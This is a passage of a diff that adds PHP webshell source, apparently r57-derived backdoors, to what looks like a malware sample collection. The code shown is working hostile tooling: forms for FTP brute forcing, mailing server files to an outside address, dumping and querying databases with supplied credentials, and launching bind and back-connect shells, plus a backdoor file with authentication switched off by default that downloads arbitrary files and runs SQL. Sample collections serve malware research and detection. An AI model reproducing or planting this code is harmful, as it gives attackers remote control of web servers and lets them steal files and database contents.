sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts; +echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.'</div>'.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from n0sh3ll")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option>MySQL</option>'; +if($mssql_on) $select .= '<option>MSSQL</option>'; +if($pg_on) $select .= '<option>PostgreSQL</option>'; +if($ora_on) $select .= '<option>Oracle</option>'; +$select .= '</select>'; +echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("show tables;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>"; +} +if(!$safe_mode&&$unix){ +echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'7978')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'7978')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dal.net')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-4><b>o---[ CopyRight by xx_user from ^no-body^ #SampitHack@irc.dal.net | <a href=http://www.sametla.com/>http://www.sametla.com/</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f; +echo '</body></html>'; +?> diff --git a/PHP/Backdoor.PHP.Rst.s b/PHP/Backdoor.PHP.Rst.s new file mode 100644 index 00000000..e3ec4758 --- /dev/null +++ b/PHP/Backdoor.PHP.Rst.s @@ -0,0 +1,2131 @@ +<?php +$language='eng'; +$auth = 0; +$name='ec371748dc2da624b35a4f8f685dd122'; +$pass='ec371748dc2da624b35a4f8f685dd122'; +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = "1.3"; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_SERVER as $k=>$v) + { + $_SERVER[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="crot"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=fbi.com>r57-shell</a> : Dilarang mas</b>"); + } +} +$head = '<!-- ?????????? ???? --> +<html> +<head> +<title>::Vulner::</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> + +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +.table1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +BACKGROUND-COLOR: #D4D0C8; +} +.td1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +font: 7pt Verdana; +} +.tr1 { +BORDER-RIGHT: #cccccc 0px; +BORDER-TOP: #cccccc 0px; +BORDER-LEFT: #cccccc 0px; +BORDER-BOTTOM: #cccccc 0px; +} +table { +BORDER-RIGHT: #eeeeee 1px outset; +BORDER-TOP: #eeeeee 1px outset; +BORDER-LEFT: #eeeeee 1px outset; +BORDER-BOTTOM: #eeeeee 1px outset; +BACKGROUND-COLOR: #D4D0C8; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #e4e0d8; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +BODY { +margin-top: 1px; +margin-right: 1px; +margin-bottom: 1px; +margin-left: 1px; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!function_exists('mssql_connect')) return 0; + $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { $this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + @mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = '##'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## --------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + $this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + $this->dump[] = '## under construction'; + break; + default: + return 0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + default: + return 0; + break; + } + } + } +if(isset($_GET['img'])&&!empty($_GET['img'])) + { + $images = array(); + $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; + $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; + @ob_clean(); + header("Content-type: image/gif"); + echo base64_decode($images[$_GET['img']]); + die(); + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if ($_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + + if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Koneksi ke SQL server gagal</b></font></div>"; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Tidak bisa memilih database</b></font></div>"; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; + switch($sql->query($query)) + { + case '0': + echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; + break; + case '1': + if($sql->get_result()) + { + echo "<table width=100%>"; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns); + echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); + echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; + } + echo "</table>"; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; + break; + } + } + } + } + } + echo "<br><form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Nilai Local</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Nilai 